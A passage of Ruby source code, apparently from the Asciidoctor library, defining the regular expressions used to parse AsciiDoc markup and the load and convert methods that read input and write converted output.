SectionLevelStyleRx = /^sect\d$/
## Lists
# Detects the start of any list item.
#
# NOTE we only have to check as far as the blank character because we know it means non-whitespace follows.
# IMPORTANT if this regexp does not agree with the regexp for each list type, the parser will hang.
AnyListRx = %r(^(?:[ \t]*(?:-|\*\**|\.\.*|\u2022|\d+\.|[a-zA-Z]\.|[IVXivx]+\))[ \t]|(?!//[^/])[ \t]*[^ \t]#{CC_ANY}*?(?::::{0,2}|;;)(?:$|[ \t])|<?\d+>[ \t]))
# Matches an unordered list item (one level for hyphens, up to 5 levels for asterisks).
#
# Examples
#
# * Foo
# - Foo
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
UnorderedListRx = /^[ \t]*(-|\*\**|\u2022)[ \t]+(#{CC_ANY}*)$/
# Matches an ordered list item (explicit numbering or up to 5 consecutive dots).
#
# Examples
#
# . Foo
# .. Foo
# 1. Foo (arabic, default)
# a. Foo (loweralpha)
# A. Foo (upperalpha)
# i. Foo (lowerroman)
# I. Foo (upperroman)
#
# NOTE leading space match is not always necessary, but is used for list reader
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
OrderedListRx = /^[ \t]*(\.\.*|\d+\.|[a-zA-Z]\.|[IVXivx]+\))[ \t]+(#{CC_ANY}*)$/
# Matches the ordinals for each type of ordered list.
OrderedListMarkerRxMap = {
arabic: /\d+\./,
loweralpha: /[a-z]\./,
lowerroman: /[ivx]+\)/,
upperalpha: /[A-Z]\./,
upperroman: /[IVX]+\)/,
#lowergreek: /[a-z]\]/,
}
# Matches a description list entry.
#
# Examples
#
# foo::
# bar:::
# baz::::
# blah;;
#
# # the term may be followed by a description on the same line...
#
# foo:: The metasyntactic variable that commonly accompanies 'bar' (see also, <<bar>>).
#
# # ...or on a separate line, which may optionally be indented
#
# foo::
# The metasyntactic variable that commonly accompanies 'bar' (see also, <<bar>>).
#
# # attribute references may be used in both the term and the description
#
# {foo-term}:: {foo-desc}
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
# NOTE must skip line comment when looking for next list item inside list
DescriptionListRx = %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?)(:::{0,2}|;;)(?:$|[ \t]+(#{CC_ANY}*)$))
# Matches a sibling description list item (excluding the delimiter specified by the key).
# NOTE must skip line comment when looking for sibling list item
DescriptionListSiblingRx = {
'::' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?[^:]|[^ \t:])(::)(?:$|[ \t]+(#{CC_ANY}*)$)),
':::' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?[^:]|[^ \t:])(:::)(?:$|[ \t]+(#{CC_ANY}*)$)),
'::::' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?[^:]|[^ \t:])(::::)(?:$|[ \t]+(#{CC_ANY}*)$)),
';;' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?)(;;)(?:$|[ \t]+(#{CC_ANY}*)$))
}
# Matches a callout list item.
#
# Examples
#
# <1> Explanation
#
# or
#
# <.> Explanation with automatic number
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
CalloutListRx = /^<(\d+|\.)>[ \t]+(#{CC_ANY}*)$/
# Matches a callout reference inside literal text.
#
# Examples
# <1> (optionally prefixed by //, #, -- or ;; line comment chars)
# <1> <2> (multiple callouts on one line)
# <!--1--> (for XML-based languages)
# <.> (auto-numbered)
#
# NOTE extract regexps are applied line-by-line, so we can use $ as end-of-line char
CalloutExtractRx = %r(((?://|#|--|;;) ?)?(\\)?<!?(|--)(\d+|\.)\3>(?=(?: ?\\?<!?\3(?:\d+|\.)\3>)*$))
CalloutExtractRxt = '(\\\\)?<()(\\d+|\\.)>(?=(?: ?\\\\?<(?:\\d+|\\.)>)*$)'
CalloutExtractRxMap = ::Hash.new {|h, k| h[k] = /(#{k.empty? ? '' : "#{::Regexp.escape k} ?"})?#{CalloutExtractRxt}/ }
# NOTE special characters have not been replaced when scanning
CalloutScanRx = /\\?<!?(|--)(\d+|\.)\1>(?=(?: ?\\?<!?\1(?:\d+|\.)\1>)*#{CC_EOL})/
# NOTE special characters have already been replaced when converting to an SGML format
CalloutSourceRx = %r(((?://|#|--|;;) ?)?(\\)?<!?(|--)(\d+|\.)\3>(?=(?: ?\\?<!?\3(?:\d+|\.)\3>)*#{CC_EOL}))
CalloutSourceRxt = "(\\\\)?<()(\\d+|\\.)>(?=(?: ?\\\\?<(?:\\d+|\\.)>)*#{CC_EOL})"
CalloutSourceRxMap = ::Hash.new {|h, k| h[k] = /(#{k.empty? ? '' : "#{::Regexp.escape k} ?"})?#{CalloutSourceRxt}/ }
# A Hash of regexps for lists used for dynamic access.
ListRxMap = {
ulist: UnorderedListRx,
olist: OrderedListRx,
dlist: DescriptionListRx,
colist: CalloutListRx,
}
## Tables
# Parses the column spec (i.e., colspec) for a table.
#
# Examples
#
# 1*h,2*,^3e
#
ColumnSpecRx = /^(?:(\d+)\*)?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?(\d+%?|~)?([a-z])?$/
# Parses the start and end of a cell spec (i.e., cellspec) for a table.
#
# Examples
#
# 2.3+<.>m
#
# FIXME use step-wise scan (or treetop) rather than this mega-regexp
CellSpecStartRx = /^[ \t]*(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
CellSpecEndRx = /[ \t]+(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
# Block macros
# Matches the custom block macro pattern.
#
# Examples
#
# gist::123456[]
#
#--
# NOTE we've relaxed the match for target to accommodate the short format (e.g., name::[attrlist])
CustomBlockMacroRx = /^(#{CG_WORD}[-#{CC_WORD}]*)::(|\S|\S#{CC_ANY}*?\S)\[(#{CC_ANY}+)?\]$/
# Matches an image, video or audio block macro.
#
# Examples
#
# image::filename.png[Caption]
# video::http://youtube.com/12345[Cats vs Dogs]
#
BlockMediaMacroRx = /^(image|video|audio)::(\S|\S#{CC_ANY}*?\S)\[(#{CC_ANY}+)?\]$/
# Matches the TOC block macro.
#
# Examples
#
# toc::[]
# toc::[levels=2]
#
BlockTocMacroRx = /^toc::\[(#{CC_ANY}+)?\]$/
## Inline macros
# Matches an anchor (i.e., id + optional reference text) in the flow of text.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
# anchor:idname[]
# anchor:idname[Reference Text]
#
InlineAnchorRx = /(\\)?(?:\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]|anchor:([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)\[(?:\]|(#{CC_ANY}*?[^\\])\]))/
# Scans for a non-escaped anchor (i.e., id + optional reference text) in the flow of text.
InlineAnchorScanRx = /(?:^|[^\\\[])\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]|(?:^|[^\\])anchor:([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)\[(?:\]|(#{CC_ANY}*?[^\\])\])/
# Scans for a leading, non-escaped anchor (i.e., id + optional reference text).
LeadingInlineAnchorRx = /^\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]/
# Matches a bibliography anchor at the start of the list item text (in a bibliography list).
#
# Examples
#
# [[[Fowler_1997]]] Fowler M. ...
#
InlineBiblioAnchorRx = /^\[\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+?))?\]\]\]/
# Matches an inline e-mail address.
#
# [email protected]
#
InlineEmailRx = %r(([\\>:/])?#{CG_WORD}(?:&|[#{CC_WORD}.%+-])*@#{CG_ALNUM}[#{CC_ALNUM}.-]*\.#{CG_ALPHA}{2,4}\b)
# Matches an inline footnote macro, which is allowed to span multiple lines.
#
# Examples
# footnote:[text] (not referenceable)
# footnote:id[text] (referenceable)
# footnote:id[] (reference)
# footnoteref:[id,text] (legacy)
# footnoteref:[id] (legacy)
#
InlineFootnoteMacroRx = /\\?footnote(?:(ref):|:([\w-]+)?)\[(?:|(#{CC_ALL}*?[^\\]))\]/m
# Matches an image or icon inline macro.
#
# Examples
#
# image:filename.png[Alt Text]
# image:http://example.com/images/filename.png[Alt Text]
# image:filename.png[More [Alt\] Text] (alt text becomes "More [Alt] Text")
# icon:github[large]
#
# NOTE be as non-greedy as possible by not allowing newline or left square bracket in target
InlineImageMacroRx = /\\?i(?:mage|con):([^:\s\[](?:[^\n\[]*[^\s\[])?)\[(|#{CC_ALL}*?[^\\])\]/m
# Matches an indexterm inline macro, which may span multiple lines.
#
# Examples
#
# indexterm:[Tigers,Big cats]
# (((Tigers,Big cats)))
# indexterm2:[Tigers]
# ((Tigers))
#
InlineIndextermMacroRx = /\\?(?:(indexterm2?):\[(#{CC_ALL}*?[^\\])\]|\(\((#{CC_ALL}+?)\)\)(?!\)))/m
# Matches either the kbd or btn inline macro.
#
# Examples
#
# kbd:[F3]
# kbd:[Ctrl+Shift+T]
# kbd:[Ctrl+\]]
# kbd:[Ctrl,T]
# btn:[Save]
#
InlineKbdBtnMacroRx = /(\\)?(kbd|btn):\[(#{CC_ALL}*?[^\\])\]/m
# Matches an implicit link and some of the link inline macro.
#
# Examples
#
# https://github.com
# https://github.com[GitHub]
# <https://github.com>
# link:https://github.com[]
#
# FIXME revisit! the main issue is we need different rules for implicit vs explicit
InlineLinkRx = %r((^|link:|#{CG_BLANK}|<|[>\(\)\[\];])(\\?(?:https?|file|ftp|irc)://[^\s\[\]<]*[^\s.,\[\]<])(?:\[(|#{CC_ALL}*?[^\\])\])?)m
# Match a link or e-mail inline macro.
#
# Examples
#
# link:path[label]
# mailto:[email protected][]
#
# NOTE be as non-greedy as possible by not allowing space or left square bracket in target
InlineLinkMacroRx = /\\?(?:link|(mailto)):(|[^:\s\[][^\s\[]*)\[(|#{CC_ALL}*?[^\\])\]/m
# Matches the name of a macro.
#
MacroNameRx = /^#{CG_WORD}[-#{CC_WORD}]*$/
# Matches a stem (and alternatives, asciimath and latexmath) inline macro, which may span multiple lines.
#
# Examples
#
# stem:[x != 0]
# asciimath:[x != 0]
# latexmath:[\sqrt{4} = 2]
#
InlineStemMacroRx = /\\?(stem|(?:latex|ascii)math):([a-z]+(?:,[a-z]+)*)?\[(#{CC_ALL}*?[^\\])\]/m
# Matches a menu inline macro.
#
# Examples
#
# menu:File[Save As...]
# menu:View[Page Style > No Style]
# menu:View[Page Style, No Style]
#
InlineMenuMacroRx = /\\?menu:(#{CG_WORD}|[#{CC_WORD}&][^\n\[]*[^\s\[])\[ *(#{CC_ALL}*?[^\\])?\]/m
# Matches an implicit menu inline macro.
#
# Examples
#
# "File > New..."
#
InlineMenuRx = /\\?"([#{CC_WORD}&][^"]*?[ \n]+>[ \n]+[^"]*)"/
# Matches an inline passthrough, which may span multiple lines.
#
# Examples
#
# +text+
# `text` (compat)
#
# NOTE we always capture the attributes so we know when to use compatible (i.e., legacy) behavior
InlinePassRx = {
false => ['+', '`', /(^|[^#{CC_WORD};:])(?:\[([^\]]+)\])?(\\?(\+|`)(\S|\S#{CC_ALL}*?\S)\4)(?!#{CG_WORD})/m],
true => ['`', nil, /(^|[^`#{CC_WORD}])(?:\[([^\]]+)\])?(\\?(`)([^`\s]|[^`\s]#{CC_ALL}*?\S)\4)(?![`#{CC_WORD}])/m]
}
# Matches an inline plus passthrough spanning multiple lines, but only when it occurs directly
# inside constrained monospaced formatting in non-compat mode.
#
# Examples
#
# +text+
#
SinglePlusInlinePassRx = /^(\\)?\+(\S|\S#{CC_ALL}*?\S)\+$/m
# Matches several variants of the passthrough inline macro, which may span multiple lines.
#
# Examples
#
# +++text+++
# $$text$$
# pass:quotes[text]
#
# NOTE we have to support an empty pass:[] for compatibility with AsciiDoc Python
InlinePassMacroRx = /(?:(?:(\\?)\[([^\]]+)\])?(\\{0,2})(\+\+\+?|\$\$)(#{CC_ALL}*?)\4|(\\?)pass:([a-z]+(?:,[a-z]+)*)?\[(|#{CC_ALL}*?[^\\])\])/m
# Matches an xref (i.e., cross-reference) inline macro, which may span multiple lines.
#
# Examples
#
# <<id,reftext>>
# xref:id[reftext]
#
# NOTE special characters have already been escaped, hence the entity references
# NOTE { is included in start characters to support target that begins with attribute reference in title content
InlineXrefMacroRx = %r(\\?(?:<<([#{CC_WORD}#/.:{]#{CC_ALL}*?)>>|xref:([#{CC_WORD}#/.:{]#{CC_ALL}*?)\[(?:\]|(#{CC_ALL}*?[^\\])\])))m
## Layout
# Matches a trailing + preceded by at least one space character,
# which forces a hard line break (<br> tag in HTML output).
#
# NOTE AsciiDoc Python allows + to be preceded by TAB; Asciidoctor does not
#
# Examples
#
# Humpty Dumpty sat on a wall, +
# Humpty Dumpty had a great fall.
#
if RUBY_ENGINE == 'opal'
# NOTE In JavaScript, ^ and $ only match the start and end of line if the multiline flag is present
HardLineBreakRx = /^(#{CC_ANY}*) \+$/m
else
# NOTE In Ruby, ^ and $ always match start and end of line
HardLineBreakRx = /^(.*) \+$/
end
# Matches a Markdown horizontal rule.
#
# Examples
#
# --- or - - -
# *** or * * *
# ___ or _ _ _
#
MarkdownThematicBreakRx = /^ {0,3}([-*_])( *)\1\2\1$/
# Matches an AsciiDoc or Markdown horizontal rule or AsciiDoc page break.
#
# Examples
#
# ''' (horizontal rule)
# <<< (page break)
# --- or - - - (horizontal rule, Markdown)
# *** or * * * (horizontal rule, Markdown)
# ___ or _ _ _ (horizontal rule, Markdown)
#
ExtLayoutBreakRx = /^(?:'{3,}|<{3,}|([-*_])( *)\1\2\1)$/
## General
# Matches consecutive blank lines.
#
# Examples
#
# one
#
# two
#
BlankLineRx = /\n{2,}/
# Matches a comma or semi-colon delimiter.
#
# Examples
#
# one,two
# three;four
#
#DataDelimiterRx = /[,;]/
# Matches whitespace (space, tab, newline) escaped by a backslash.
#
# Examples
#
# three\ blind\ mice
#
EscapedSpaceRx = /\\([ \t\n])/
# Detects if text is a possible candidate for the replacements substitution.
#
ReplaceableTextRx = /[&']|--|\.\.\.|\([CRT]M?\)/
# Matches a whitespace delimiter, a sequence of spaces, tabs, and/or newlines.
# Matches the parsing rules of %w strings in Ruby.
#
# Examples
#
# one two three four
# five six
#
# TODO change to /(?<!\\)[ \t\n]+/ once lookbehind assertions are implemented in all modern browsers
SpaceDelimiterRx = /([^\\])[ \t\n]+/
# Matches a + or - modifier in a subs list
#
SubModifierSniffRx = /[+-]/
# Matches one or more consecutive digits at the end of a line.
#
# Examples
#
# docbook5
# html5
#
TrailingDigitsRx = /\d+$/
# Detects strings that resemble URIs.
#
# Examples
# http://domain
# https://domain
# file:///path
# data:info
#
# not c:/sample.adoc or c:\sample.adoc
#
UriSniffRx = %r(^#{CG_ALPHA}[#{CC_ALNUM}.+-]+:/{0,2})
# Detects the end of an implicit URI in the text
#
# Examples
#
# (http://google.com)
# >http://google.com<
# (See http://google.com):
#
UriTerminatorRx = /[);:]$/
# Detects XML tags
XmlSanitizeRx = /<[^>]+>/
#end
INTRINSIC_ATTRIBUTES = {
'startsb' => '[',
'endsb' => ']',
'vbar' => '|',
'caret' => '^',
'asterisk' => '*',
'tilde' => '~',
'plus' => '+',
'backslash' => '\\',
'backtick' => '`',
'blank' => '',
'empty' => '',
'sp' => ' ',
'two-colons' => '::',
'two-semicolons' => ';;',
'nbsp' => ' ',
'deg' => '°',
'zwsp' => '​',
'quot' => '"',
'apos' => ''',
'lsquo' => '‘',
'rsquo' => '’',
'ldquo' => '“',
'rdquo' => '”',
'wj' => '⁠',
'brvbar' => '¦',
'pp' => '++',
'cpp' => 'C++',
'amp' => '&',
'lt' => '<',
'gt' => '>'
}
# unconstrained quotes:: can appear anywhere
# constrained quotes:: must be bordered by non-word characters
# NOTE these substitutions are processed in the order they appear here and
# the order in which they are replaced is important
quote_subs = [
# **strong**
[:strong, :unconstrained, /\\?(?:\[([^\]]+)\])?\*\*(#{CC_ALL}+?)\*\*/m],
# *strong*
[:strong, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?\*(\S|\S#{CC_ALL}*?\S)\*(?!#{CG_WORD})/m],
# "`double-quoted`"
[:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?"`(\S|\S#{CC_ALL}*?\S)`"(?!#{CG_WORD})/m],
# '`single-quoted`'
[:single, :constrained, /(^|[^#{CC_WORD};:`}])(?:\[([^\]]+)\])?'`(\S|\S#{CC_ALL}*?\S)`'(?!#{CG_WORD})/m],
# ``monospaced``
[:monospaced, :unconstrained, /\\?(?:\[([^\]]+)\])?``(#{CC_ALL}+?)``/m],
# `monospaced`
[:monospaced, :constrained, /(^|[^#{CC_WORD};:"'`}])(?:\[([^\]]+)\])?`(\S|\S#{CC_ALL}*?\S)`(?![#{CC_WORD}"'`])/m],
# __emphasis__
[:emphasis, :unconstrained, /\\?(?:\[([^\]]+)\])?__(#{CC_ALL}+?)__/m],
# _emphasis_
[:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?_(\S|\S#{CC_ALL}*?\S)_(?!#{CG_WORD})/m],
# ##mark## (referred to in AsciiDoc Python as unquoted)
[:mark, :unconstrained, /\\?(?:\[([^\]]+)\])?##(#{CC_ALL}+?)##/m],
# #mark# (referred to in AsciiDoc Python as unquoted)
[:mark, :constrained, /(^|[^#{CC_WORD}&;:}])(?:\[([^\]]+)\])?#(\S|\S#{CC_ALL}*?\S)#(?!#{CG_WORD})/m],
# ^superscript^
[:superscript, :unconstrained, /\\?(?:\[([^\]]+)\])?\^(\S+?)\^/],
# ~subscript~
[:subscript, :unconstrained, /\\?(?:\[([^\]]+)\])?~(\S+?)~/]
]
compat_quote_subs = quote_subs.drop 0
# ``quoted''
compat_quote_subs[2] = [:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?``(\S|\S#{CC_ALL}*?\S)''(?!#{CG_WORD})/m]
# `quoted'
compat_quote_subs[3] = [:single, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?`(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
# ++monospaced++
compat_quote_subs[4] = [:monospaced, :unconstrained, /\\?(?:\[([^\]]+)\])?\+\+(#{CC_ALL}+?)\+\+/m]
# +monospaced+
compat_quote_subs[5] = [:monospaced, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?\+(\S|\S#{CC_ALL}*?\S)\+(?!#{CG_WORD})/m]
# #unquoted#
#compat_quote_subs[8] = [:unquoted, *compat_quote_subs[8][1..-1]]
# ##unquoted##
#compat_quote_subs[9] = [:unquoted, *compat_quote_subs[9][1..-1]]
# 'emphasis'
compat_quote_subs.insert 3, [:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+)\])?'(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
QUOTE_SUBS = {
false => quote_subs,
true => compat_quote_subs
}
quote_subs = nil
compat_quote_subs = nil
# NOTE order of replacements is significant
REPLACEMENTS = [
# (C)
[/\\?\(C\)/, '©', :none],
# (R)
[/\\?\(R\)/, '®', :none],
# (TM)
[/\\?\(TM\)/, '™', :none],
# foo -- bar (where either space character can be a newline)
# NOTE this necessarily drops the newline if it appears at end of line
[/(^|\n| |\\)--( |\n|$)/, ' — ', :none],
# foo--bar
[/(#{CG_WORD})\\?--(?=#{CG_WORD})/, '—​', :leading],
# ellipsis
[/\\?\.\.\./, '…​', :leading],
# right single quote
[/\\?`'/, '’', :none],
# apostrophe (inside a word)
[/(#{CG_ALNUM})\\?'(?=#{CG_ALPHA})/, '’', :leading],
# right arrow ->
[/\\?->/, '→', :none],
# right double arrow =>
[/\\?=>/, '⇒', :none],
# left arrow <-
[/\\?<-/, '←', :none],
# left double arrow <=
[/\\?<=/, '⇐', :none],
# restore entities
[/\\?(&)amp;((?:[a-zA-Z][a-zA-Z]+\d{0,2}|#\d\d\d{0,4}|#x[\da-fA-F][\da-fA-F][\da-fA-F]{0,3});)/, '', :bounding]
]
class << self
# Public: Parse the AsciiDoc source input into a {Document}
#
# Accepts input as an IO (or StringIO), String or String Array object. If the
# input is a File, the object is expected to be opened for reading and is not
# closed afterwards by this method. Information about the file (filename,
# directory name, etc) gets assigned to attributes on the Document object.
#
# input - the AsciiDoc source as a IO, String or Array.
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See {Document#initialize} for details about these options.
#
# Returns the Document
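    #
    # Example (an illustrative usage sketch, not part of the original source;
    # the AsciiDoc string and options below are made up):
    #
    #   doc = Asciidoctor.load 'Hello, *AsciiDoc*!', safe: :safe
    #   doc.convert
    #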
def load input, options = {}
options = options.dup
if (timings = options[:timings])
timings.start :read
end
if (logger = options[:logger]) && logger != LoggerManager.logger
LoggerManager.logger = logger
end
if !(attrs = options[:attributes])
attrs = {}
elsif ::Hash === attrs || ((defined? ::Java::JavaUtil::Map) && ::Java::JavaUtil::Map === attrs)
attrs = attrs.dup
elsif ::Array === attrs
attrs = {}.tap do |accum|
attrs.each do |entry|
k, _, v = entry.partition '='
accum[k] = v
end
end
elsif ::String === attrs
# condense and convert non-escaped spaces to null, unescape escaped spaces, then split on null
attrs = {}.tap do |accum|
attrs.gsub(SpaceDelimiterRx, '\1' + NULL).gsub(EscapedSpaceRx, '\1').split(NULL).each do |entry|
k, _, v = entry.partition '='
accum[k] = v
end
end
elsif (attrs.respond_to? :keys) && (attrs.respond_to? :[])
# coerce attrs to a real Hash
attrs = {}.tap {|accum| attrs.keys.each {|k| accum[k] = attrs[k] } }
else
raise ::ArgumentError, %(illegal type for attributes option: #{attrs.class.ancestors.join ' < '})
end
if ::File === input
options[:input_mtime] = input.mtime
# TODO cli checks if input path can be read and is file, but might want to add check to API too
        input_path = ::File.absolute_path input.path
        # NOTE defer setting infile and indir until we get a better sense of their purpose
        attrs['docfile'] = input_path
attrs['docdir'] = ::File.dirname input_path
attrs['docname'] = Helpers.basename input_path, (attrs['docfilesuffix'] = ::File.extname input_path)
source = input.read
elsif input.respond_to? :read
# NOTE tty, pipes & sockets can't be rewound, but can't be sniffed easily either
# just fail the rewind operation silently to handle all cases
input.rewind rescue nil
source = input.read
elsif ::String === input
source = input
elsif ::Array === input
source = input.drop 0
elsif input
raise ::ArgumentError, %(unsupported input type: #{input.class})
end
if timings
timings.record :read
timings.start :parse
end
options[:attributes] = attrs
doc = options[:parse] == false ? (Document.new source, options) : (Document.new source, options).parse
timings.record :parse if timings
doc
rescue => ex
begin
context = %(asciidoctor: FAILED: #{attrs['docfile'] || '<stdin>'}: Failed to load AsciiDoc document)
if ex.respond_to? :exception
# The original message must be explicitly preserved when wrapping a Ruby exception
wrapped_ex = ex.exception %(#{context} - #{ex.message})
# JRuby automatically sets backtrace; MRI did not until 2.6
wrapped_ex.set_backtrace ex.backtrace
else
# Likely a Java exception class
wrapped_ex = ex.class.new context, ex
wrapped_ex.stack_trace = ex.stack_trace
end
rescue
wrapped_ex = ex
end
raise wrapped_ex
end
# Public: Parse the contents of the AsciiDoc source file into an Asciidoctor::Document
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Asciidoctor::Document
def load_file filename, options = {}
::File.open(filename, FILE_READ_MODE) {|file| self.load file, options }
end
# Public: Parse the AsciiDoc source input into an Asciidoctor::Document and
# convert it to the specified backend format.
#
# Accepts input as an IO (or StringIO), String or String Array object. If the
# input is a File, the object is expected to be opened for reading and is not
# closed afterwards by this method. Information about the file (filename,
# directory name, etc) gets assigned to attributes on the Document object.
#
# If the :to_file option is true, and the input is a File, the output is
# written to a file adjacent to the input file, having an extension that
# corresponds to the backend format. Otherwise, if the :to_file option is
# specified, the file is written to that file. If :to_file is not an absolute
# path, it is resolved relative to :to_dir, if given, otherwise the
# Document#base_dir. If the target directory does not exist, it will not be
# created unless the :mkdirs option is set to true. If the file cannot be
# written because the target directory does not exist, or because it falls
# outside of the Document#base_dir in safe mode, an IOError is raised.
#
# If the output is going to be written to a file, the header and footer are
# included unless specified otherwise (writing to a file implies creating a
# standalone document). Otherwise, the header and footer are not included by
# default and the converted result is returned.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
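    #
    # Example (an illustrative sketch, not part of the original source):
    #
    #   html = Asciidoctor.convert 'Hello, *AsciiDoc*!', safe: :safe
    #   # => converted String (no header/footer, since no file is written)
    #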
def convert input, options = {}
options = options.dup
options.delete(:parse)
to_file = options.delete(:to_file)
to_dir = options.delete(:to_dir)
mkdirs = options.delete(:mkdirs) || false
case to_file
when true, nil
write_to_same_dir = !to_dir && ::File === input
stream_output = false
write_to_target = to_dir
to_file = nil
when false
write_to_same_dir = false
stream_output = false
write_to_target = false
to_file = nil
when '/dev/null'
return self.load input, options
else
write_to_same_dir = false
write_to_target = (stream_output = to_file.respond_to? :write) ? false : (options[:to_file] = to_file)
end
unless options.key? :header_footer
options[:header_footer] = true if write_to_same_dir || write_to_target
end
# NOTE outfile may be controlled by document attributes, so resolve outfile after loading
if write_to_same_dir
input_path = ::File.absolute_path input.path
options[:to_dir] = (outdir = ::File.dirname input_path)
elsif write_to_target
if to_dir
if to_file
options[:to_dir] = ::File.dirname ::File.expand_path ::File.join to_dir, to_file
else
options[:to_dir] = ::File.expand_path to_dir
end
elsif to_file
options[:to_dir] = ::File.dirname ::File.expand_path to_file
end
end
# NOTE :to_dir is always set when outputting to a file
# NOTE :to_file option only passed if assigned an explicit path
doc = self.load input, options
if write_to_same_dir # write to file in same directory
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
if outfile == input_path
raise ::IOError, %(input file and output file cannot be the same: #{outfile})
end
elsif write_to_target # write to explicit file or directory
working_dir = (options.key? :base_dir) ? (::File.expand_path options[:base_dir]) : ::Dir.pwd
# QUESTION should the jail be the working_dir or doc.base_dir???
jail = doc.safe >= SafeMode::SAFE ? working_dir : nil
if to_dir
outdir = doc.normalize_system_path(to_dir, working_dir, jail, target_name: 'to_dir', recover: false)
if to_file
outfile = doc.normalize_system_path(to_file, outdir, nil, target_name: 'to_dir', recover: false)
# reestablish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
else
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
end
elsif to_file
outfile = doc.normalize_system_path(to_file, working_dir, jail, target_name: 'to_dir', recover: false)
# establish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
end
if ::File === input && outfile == (::File.absolute_path input.path)
raise ::IOError, %(input file and output file cannot be the same: #{outfile})
end
if mkdirs
Helpers.mkdir_p outdir
else
# NOTE we intentionally refer to the directory as it was passed to the API
raise ::IOError, %(target directory does not exist: #{to_dir} (hint: set mkdirs option)) unless ::File.directory? outdir
end
else # write to stream
outfile = to_file
outdir = nil
end
opts = outfile && !stream_output ? { 'outfile' => outfile, 'outdir' => outdir } : {}
output = doc.convert opts
if outfile
doc.write output, outfile
# NOTE document cannot control this behavior if safe >= SafeMode::SERVER
# NOTE skip if stylesdir is a URI
if !stream_output && doc.safe < SafeMode::SECURE && (doc.attr? 'linkcss') && (doc.attr? 'copycss') &&
(doc.basebackend? 'html') && !((stylesdir = (doc.attr 'stylesdir')) && (Helpers.uriish? stylesdir))
if (stylesheet = doc.attr 'stylesheet')
if DEFAULT_STYLESHEET_KEYS.include? stylesheet
copy_asciidoctor_stylesheet = true
elsif !(Helpers.uriish? stylesheet)
copy_user_stylesheet = true
end
end
copy_syntax_hl_stylesheet = (syntax_hl = doc.syntax_highlighter) && (syntax_hl.write_stylesheet? doc)
if copy_asciidoctor_stylesheet || copy_user_stylesheet || copy_syntax_hl_stylesheet
stylesoutdir = doc.normalize_system_path(stylesdir, outdir, doc.safe >= SafeMode::SAFE ? outdir : nil)
if mkdirs
Helpers.mkdir_p stylesoutdir
else
raise ::IOError, %(target stylesheet directory does not exist: #{stylesoutdir} (hint: set mkdirs option)) unless ::File.directory? stylesoutdir
end
if copy_asciidoctor_stylesheet
Stylesheets.instance.write_primary_stylesheet stylesoutdir
# FIXME should Stylesheets also handle the user stylesheet?
elsif copy_user_stylesheet
if (stylesheet_src = doc.attr 'copycss').empty?
stylesheet_src = doc.normalize_system_path stylesheet
else
# NOTE in this case, copycss is a source location (but cannot be a URI)
stylesheet_src = doc.normalize_system_path stylesheet_src
end
stylesheet_dest = doc.normalize_system_path stylesheet, stylesoutdir, (doc.safe >= SafeMode::SAFE ? outdir : nil)
# NOTE don't warn if src can't be read and dest already exists (see #2323)
if stylesheet_src != stylesheet_dest && (stylesheet_data = doc.read_asset stylesheet_src,
warn_on_failure: !(::File.file? stylesheet_dest), label: 'stylesheet')
::File.write stylesheet_dest, stylesheet_data, mode: FILE_WRITE_MODE
end
end
syntax_hl.write_stylesheet doc, stylesoutdir if copy_syntax_hl_stylesheet
end
end
doc
else
output
end
end
# Alias render to convert to maintain backwards compatibility
alias render convert
# Public: Parse the contents of the AsciiDoc source file into an
# Asciidoctor::Document and convert it to the specified backend format.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert_file filename, options = {}
